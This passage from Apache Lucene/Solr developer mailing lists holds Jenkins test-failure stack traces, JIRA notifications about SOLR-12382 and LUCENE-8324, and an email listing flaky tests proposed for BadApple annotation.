org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakContr

[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{<autoCommit>}}
{{  <maxTime>15000</maxTime>}}
{{  <openSearcher>false</openSearcher>}}
{{</autoCommit>}}
{{<autoSoftCommit>}}
{{  <maxTime>-1</maxTime>}}
{{</autoSoftCommit>}}

 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{<autoCommit><maxTime>15000</maxTime><openSearcher>false</openSearcher></autoCommit>}}
{{<autoSoftCommit><maxTime>-1</maxTime></autoSoftCommit>}}

 


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public (Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
> {{<autoCommit>}}
> {{  <maxTime>15000</maxTime>}}
> {{  <openSearcher>false</openSearcher>}}
> {{</autoCommit>}}
> {{<autoSoftCommit>}}
> {{  <maxTime>-1</maxTime>}}
> {{</autoSoftCommit>}}
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).
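The behavior described above can be probed with a plain HTTP commit; below is a minimal stdlib sketch of building that request (host and collection name are hypothetical, and `waitSearcher=true` is the update parameter that the report's `commit(waitSearch:true)` corresponds to):

```python
from urllib.parse import urlencode

def commit_url(base="http://localhost:8983/solr", collection="tlog_pull_test"):
    # Hard commit that blocks until the new searcher is registered on the
    # node receiving the request -- not until PULL replicas have replicated.
    params = urlencode({"commit": "true", "waitSearcher": "true", "wt": "json"})
    return f"{base}/{collection}/update?{params}"

print(commit_url())
```

Since PULL replicas copy segments from the leader on their replication poll interval, a commit that only waits on the leader's searcher would be consistent with followers serving stale results for a few seconds, as observed.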



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-NightlyTests-master - Build # 1548 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-NightlyTests-master/1548/

12 tests failed.
FAILED:  
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode

Error Message:
unexpected DELETENODE status: 
{responseHeader={status=0,QTime=72},status={state=notfound,msg=Did not find 
[search_rate_trigger3/20ee492921697eTaao99t7zbi77399vzpf7cge6f/0] in any tasks 
queue}}

Stack Trace:
java.lang.AssertionError: unexpected DELETENODE status: 
{responseHeader={status=0,QTime=72},status={state=notfound,msg=Did not find 
[search_rate_trigger3/20ee492921697eTaao99t7zbi77399vzpf7cge6f/0] in any tasks 
queue}}
at 
__randomizedtesting.SeedInfo.seed([7567D9CAA6EF18CE:57F51748912597B3]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.lambda$testDeleteNode$6(SearchRateTriggerIntegrationTest.java:668)
at java.util.ArrayList.forEach(ArrayList.java:1257)
at 
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode(SearchRateTriggerIntegrationTest.java:660)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(St

[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{<autoCommit><maxTime>15000</maxTime><openSearcher>false</openSearcher></autoCommit>}}
{{<autoSoftCommit><maxTime>-1</maxTime></autoSoftCommit>}}

 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

 <autoCommit><maxTime>15000</maxTime><openSearcher>false</openSearcher></autoCommit>
 <autoSoftCommit><maxTime>-1</maxTime></autoSoftCommit>

 

Description: 
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaves as expected (query returns newly added data right after 
commit(waitSearch:true) is called).

  was:On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would return newly added data.  


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public (Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
> {{<autoCommit><maxTime>15000</maxTime><openSearcher>false</openSearcher></autoCommit>}}
> {{<autoSoftCommit><maxTime>-1</maxTime></autoSoftCommit>}}
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaves as expected (query returns newly added data right after 
> commit(waitSearch:true) is called).






[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Description: 
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaved as expected (query returned newly added data right after 
commit(waitSearch:true) was called).

  was:
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaves as expected (query returns newly added data right after 
commit(waitSearch:true) is called).


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public (Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
> {{<autoCommit><maxTime>15000</maxTime><openSearcher>false</openSearcher></autoCommit>}}
> {{<autoSoftCommit><maxTime>-1</maxTime></autoSoftCommit>}}
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).






[jira] [Created] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)
Nguyen Nguyen created SOLR-12382:


 Summary: new data not seen immediately after commit() on SolrCloud 
collection with only TLOG and PULL replicas
 Key: SOLR-12382
 URL: https://issues.apache.org/jira/browse/SOLR-12382
 Project: Solr
  Issue Type: Bug
  Security Level: Public (Default Security Level. Issues are Public)
Affects Versions: 7.3
 Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
replicas + 1 PULL replica

 

Commit settings

 <autoCommit><maxTime>15000</maxTime><openSearcher>false</openSearcher></autoCommit>
 <autoSoftCommit><maxTime>-1</maxTime></autoSoftCommit>

 
Reporter: Nguyen Nguyen


On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would return newly added data.  






[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread Nhat Nguyen (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483044#comment-16483044
 ] 

Nhat Nguyen commented on LUCENE-8324:
-

Thanks [~simonw] and [~mikemccand]

> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]






[JENKINS] Lucene-Solr-master-Windows (64bit/jdk-10.0.1) - Build # 7330 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-Windows/7330/
Java: 64bit/jdk-10.0.1 -XX:+UseCompressedOops -XX:+UseParallelGC

1 tests failed.
FAILED:  org.apache.solr.common.util.TestTimeSource.testEpochTime

Error Message:
SimTimeSource:50.0 time diff=1955

Stack Trace:
java.lang.AssertionError: SimTimeSource:50.0 time diff=1955
at 
__randomizedtesting.SeedInfo.seed([6AAFCFA7A002F8C4:52C3BC8234D25A82]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.common.util.TestTimeSource.doTestEpochTime(TestTimeSource.java:52)
at 
org.apache.solr.common.util.TestTimeSource.testEpochTime(TestTimeSource.java:32)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.base/java.lang.Thread.run(Thread.java:844)




Build Log:
[...truncated 15834 lines...]
   [junit4] Suite: org.apache.solr.common.util.TestTimeSource
   [junit4]   2> Creating dataDir: 
C:\Users\jenkins\workspace\Lucene-Solr-master-Windows\solr\build\solr-solrj\tes

Re: BadApple candidates

2018-05-21 Thread Alan Woodward
Looks like it was an OOM, can you leave that one be for now?

> On 21 May 2018, at 19:11, Erick Erickson  wrote:
> 
> Alan:
> 
> http://fucit.org/solr-jenkins-reports/job-data/sarowe/Lucene-Solr-Nightly-7.x/256/
> 
> You can get there from Hoss's rollup reports here:
> http://fucit.org/solr-jenkins-reports/failure-report.html
> 
> To be included in any potential BadApple, two things must be true:
> 1> it must have failed since last Monday
> 2> it must have failed in the report collected two weeks ago Monday
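The two conditions above amount to intersecting two failure reports; a rough sketch of that filter (the test names below are illustrative examples, not Hoss's actual report format):

```python
def badapple_candidates(failed_last_week, failed_weeks_ago):
    # A test becomes a BadApple candidate only if it appears
    # in both reporting windows.
    return sorted(set(failed_last_week) & set(failed_weeks_ago))

last_week = {
    "org.apache.solr.cloud.AddReplicaTest.test",
    "org.apache.solr.cloud.BrandNewFlakeTest.test",   # hypothetical
}
weeks_ago = {
    "org.apache.solr.cloud.AddReplicaTest.test",
    "org.apache.solr.cloud.SinceFixedTest.test",      # hypothetical
}
print(badapple_candidates(last_week, weeks_ago))
# ['org.apache.solr.cloud.AddReplicaTest.test']
```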
> 
> Erick
> 
> 
> On Mon, May 21, 2018 at 12:40 PM, Alan Woodward  wrote:
>> When did TestLRUQueryCache fail?  I haven’t seen that one.
>> 
>>> On 21 May 2018, at 16:00, Erick Erickson  wrote:
>>> 
>>> I'm going to change how I collect the badapple candidates. After
>>> getting a little
>>> overwhelmed by the number of failure e-mails (even ignoring the ones with
>>> BadApple enabled), "It come to me in a vision! In a flash!" (points if you
>>> know where that comes from, hint: Old music involving a pickle).
>>> 
>>> Since I collect failures for a week and then filter them by what's
>>> also in Hoss's
>>> results from two weeks ago, that's really equivalent to creating the 
>>> candidate
>>> list from the intersection of the most recent week of Hoss's results and the
>>> results from _three_ weeks ago. Much faster too. Thanks Hoss!
>>> 
>>> So that's what I'll do going forward.
>>> 
>>> Meanwhile, here's the list for this Thursday.
>>> 
>>> BadApple candidates: I'll BadApple these on Thursday unless there are 
>>> objections
>>> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
>>> org.apache.solr.TestDistributedSearch.test
>>> org.apache.solr.cloud.AddReplicaTest.test
>>> org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testV1
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testV2
>>> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
>>> org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
>>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
>>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
>>> org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
>>> org.apache.solr.cloud.RestartWhileUpdatingTest.test
>>> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
>>> org.apache.solr.cloud.TestPullReplica.testCreateDelete
>>> org.apache.solr.cloud.TestPullReplica.testKillLeader
>>> org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
>>> org.apache.solr.cloud.UnloadDistributedZkTest.test
>>> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
>>> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
>>> org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
>>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
>>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
>>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
>>> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
>>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
>>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
>>> org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
>>> org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
>>> org.apache.solr.cloud.hdfs.StressHdfsTest.test
>>> org.apache.solr.handler.TestSQLHandler.doTest
>>> org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
>>> org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
>>> org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
>>> org.apache.solr.update.TestInPlaceUpdatesDistrib.test
>>> 
>>> 
>>> Number of AwaitsFix: 21 Number of BadApples: 99
>>> 
>>> *AwaitsFix Annotations:
>>> 
>>> 
>>> Lucene AwaitsFix
>>> GeoPolygonTest.java
>>> testLUCENE8276_case3()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276";)
>>> 
>>> GeoPolygonTest.java
>>> testLUCENE8280()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280";)
>>> 
>>> GeoPolygonTest.java
>>> testLUCENE8281()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>> 
>>> RandomGeoPolygonTest.java
>>> testCompareBigPolygons()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>> 
>>> RandomGeoPolygonTest.java
>>> testCompareSmallPolygons()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>> 
>>> TestControlledRealTimeReopenThread.java
>>> testCRTReopen()
>>> @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-

[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482885#comment-16482885
 ] 

ASF subversion and git services commented on LUCENE-8324:
-

Commit 2ce53791d3205efff5eb12d0d24911b3ea31abe3 in lucene-solr's branch 
refs/heads/master from [~simonw]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=2ce5379 ]

LUCENE-8324: Checkpoint after fully deletes segment is dropped on flush


> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]






[jira] [Resolved] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread Simon Willnauer (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Simon Willnauer resolved LUCENE-8324.
-
Resolution: Fixed

thanks [~dnhatn]







[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482874#comment-16482874
 ] 

ASF subversion and git services commented on LUCENE-8324:
-

Commit cc2ee2305001a49536886653d2133ee1a3b51b82 in lucene-solr's branch 
refs/heads/branch_7x from [~simonw]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=cc2ee23 ]

LUCENE-8324: Checkpoint after fully deletes segment is dropped on flush








[jira] [Comment Edited] (SOLR-12223) Document 'Initial Startup' for bidirectional approach in CDCR

